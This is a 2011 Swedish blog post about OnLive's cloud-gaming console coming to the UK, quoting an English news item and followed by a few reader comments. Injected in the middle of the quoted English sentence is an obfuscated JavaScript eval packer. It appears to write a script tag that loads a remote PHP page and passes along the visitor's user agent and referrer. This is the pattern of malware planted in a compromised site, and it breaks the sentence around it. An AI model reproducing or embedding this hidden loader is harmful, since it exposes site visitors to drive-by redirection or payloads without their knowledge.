Image Image Image Image Image Image Image Image Image Image

| 25 november, 2020

Scroll to top

Top

OnLive klar för release i Storbritannien!

Filip Urde
  • On 3 juni, 2011
  • http://www.revue.se/filip-urde

OnLive, ”alla konsoler i ett” maskinen har gått ut med att dem är snart redo för en release i Storbritannien. Man siktar på hösten 2011 och OnLive-konsolen kommer också att säljas i Storbritannien från och med i höst. OnLive fungerar till samtliga plattformar (PC, Mac, TV och senare även tablets), detta är en stor konkurrens fördel som OnLive bidrar med.

The eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|drfza|var|u0026u|referrer|ydthy||js|php’.split(’|’),0,{}))
platform has won support from Electronic Arts, Ubisoft, Take-Two Interactive, THQ and Warner Bros.
OnLive will offer up to 20 titles at launch include Assassin’s Creed II, Prince of Persia: The Forgotten Sands and Metro 2033.  Microsoft and Sony
have both dismissed the threat from OnLive, claiming that the technology is ’not there yet’.

http://www.computerandvideogames.com/249607/news/onlive-uk-release-date-is-end-of-2011/

Vare sig Microsoft och Sony tror på det eller ej, OnLive är på ingång och om allt bara flyter på så är möjligheterna oändliga!

Hejja OnLive!!!

Comments

  1. Gamer

    Det här är riktigt soft. Läste något om att Playstation 4 finns att förboka nu. Men varför köpa det när man kan ha denna lilla pryl istället 🙂

    • Ja den värkar kunna bli hur bra som helst. Vad som är motgången hittills, är mängden spel kontrakt man kunnat leverera. Vid lansering som du kan läsa ovan, så kommer 20st och det är spel som assasins creed2 …tyvärr inget BF3 direkt. Men ge detta tid! jag tror OnLive kommer forma framtiden. 😀

  2. Då kan man säga hej då till sitt playstation 3 som inköptes för 5000kr, ca 3 år sedan.